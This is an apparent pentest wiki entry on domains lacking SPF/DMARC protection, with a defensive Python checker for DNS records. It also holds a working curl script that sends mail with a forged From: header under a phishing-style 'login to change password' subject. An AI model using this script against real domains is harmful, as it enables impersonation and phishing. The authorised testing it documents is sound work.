Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V14 - Config

Mail Server Misconfiguration - No Spoofing Protection on Email Domain

POC

First check whether the domain publishes SPF and DMARC records that would let receivers reject forged mail. BishopFox's spoofcheck (https://github.com/BishopFox/spoofcheck) does the DNS lookups and evaluation for you:

python spoofcheck.py target.com

Then confirm that a spoofed message is actually delivered by sending one through a third-party mailer that lets you set an arbitrary From: address. The script below uses SendGrid's legacy v2 Web API (since replaced by v3, so substitute your own relay if the endpoint is no longer available). Fill in your SendGrid credentials and point SGTO at a mailbox you control; each field is passed through --data-urlencode so spaces and newlines in the subject and body are encoded correctly.

#!/bin/sh
# Send a message with a forged From: header via SendGrid's legacy v2 Web API.
SGUSER=""
SGPASS=""
SGTO="testemailaccount@outlook.com"
SGTONAME="Test"
SGFROM="security@target.com"
SGFROMNAME="Target Team"
SGSUBJECT="Major Breach - Please Login to Change Password"
SGTEXT="Good Evening,

This is a Spoofed Email. It could contain malicious files or links to trick your users into compromising their machines.

Best Regards,
"

curl --data-urlencode "api_user=${SGUSER}" \
     --data-urlencode "api_key=${SGPASS}" \
     --data-urlencode "to=${SGTO}" \
     --data-urlencode "toname=${SGTONAME}" \
     --data-urlencode "from=${SGFROM}" \
     --data-urlencode "fromname=${SGFROMNAME}" \
     --data-urlencode "subject=${SGSUBJECT}" \
     --data-urlencode "text=${SGTEXT}" \
     https://api.sendgrid.com/api/mail.send.json
echo

If the message lands in the test inbox with From: security@target.com, spoofing of the domain is possible. Record the SPF/DMARC state from the first step as the root cause in the finding.
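The evaluation that spoofcheck performs can be reproduced on records you have already pulled (for example with dig TXT target.com and dig TXT _dmarc.target.com), which is useful when you need to explain to the customer exactly why the domain is spoofable. The following is an added example, not Cobalt's or spoofcheck's own code. It takes the TXT records as input so it runs offline; the sample records are constructed, and the scoring model (only an enforcing DMARC policy protects the visible From: header, SPF alone covers just the envelope sender) is the author's assumption, documented in the code.

```python
import re

# Constructed sample TXT records for a fictional domain (not real lookups).
SAMPLE_DOMAIN_TXT = [
    "v=spf1 include:_spf.example-mailer.net ~all",
    "google-site-verification=abc123",
]
SAMPLE_DMARC_TXT = ["v=DMARC1; p=none; rua=mailto:dmarc@target.example"]


def find_spf(txt_records):
    """Return the single v=spf1 record, or None when absent or duplicated.

    RFC 7208 treats more than one v=spf1 record as a permanent error, and
    receivers then evaluate the domain as if it published no SPF at all.
    """
    spf = [r for r in txt_records if r.strip().lower().startswith("v=spf1")]
    return spf[0] if len(spf) == 1 else None


def spf_all_qualifier(spf):
    """Qualifier on the terminal 'all' mechanism: '+', '-', '~', '?' or None.

    None means there is no 'all' term (for example a record that only uses a
    redirect= modifier); the policy cannot be judged without following it.
    """
    for term in spf.split()[1:]:
        m = re.fullmatch(r"([-~?+]?)all", term, re.IGNORECASE)
        if m:
            return m.group(1) or "+"  # an unqualified 'all' means +all
    return None


def parse_dmarc(txt_records):
    """Parse the _dmarc.<domain> TXT record into a lowercase tag dict, or None."""
    for r in txt_records:
        if r.strip().lower().startswith("v=dmarc1"):
            tags = {}
            for part in r.split(";"):
                if "=" in part:
                    k, v = part.split("=", 1)
                    tags[k.strip().lower()] = v.strip().lower()
            return tags
    return None


def assess(domain_txt, dmarc_txt):
    """Return (spoofable, findings) for a domain's TXT and _dmarc TXT records.

    Assumed model: third-party spoofing of the From: header is blocked only by
    an enforcing DMARC policy. SPF results are reported as supporting evidence.
    """
    findings = []
    spf = find_spf(domain_txt)
    if spf is None:
        findings.append("SPF: no single v=spf1 record; SPF evaluates to none")
    else:
        q = spf_all_qualifier(spf)
        if q == "-":
            findings.append("SPF: -all, hard fail on forged envelope sender")
        elif q == "~":
            findings.append("SPF: ~all, soft fail; most receivers still deliver")
        elif q in ("?", "+"):
            findings.append(f"SPF: {q}all permits any sender")
        else:
            findings.append("SPF: no 'all' term (redirect?); policy undetermined")

    dmarc = parse_dmarc(dmarc_txt)
    if dmarc is None:
        findings.append("DMARC: no record; the From: header is never checked")
        return True, findings

    policy = dmarc.get("p", "none")
    try:
        pct = int(dmarc.get("pct", "100"))
    except ValueError:
        pct = 100
    if dmarc.get("sp", policy) not in ("quarantine", "reject"):
        findings.append("DMARC: subdomain policy (sp) is not enforcing")

    if policy == "reject":
        # RFC 7489 6.6.4: mail outside the pct sample gets the next lower
        # policy, so p=reject with pct<100 still quarantines the remainder.
        findings.append(f"DMARC: p=reject, pct={pct}")
        return False, findings
    if policy == "quarantine" and pct == 100:
        findings.append("DMARC: p=quarantine enforced on all mail")
        return False, findings
    if policy == "quarantine":
        findings.append(f"DMARC: p=quarantine at pct={pct}; the rest is p=none")
    else:
        findings.append("DMARC: p=none (monitor only); spoofed mail is delivered")
    return True, findings


if __name__ == "__main__":
    spoofable, findings = assess(SAMPLE_DOMAIN_TXT, SAMPLE_DMARC_TXT)
    print("Spoofing possible" if spoofable else "Protected")
    for line in findings:
        print(" -", line)
```

Running it against the constructed sample (~all plus p=none) reports "Spoofing possible", which matches what the SendGrid test above would confirm by delivery.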

Impact

High

Likelihood

High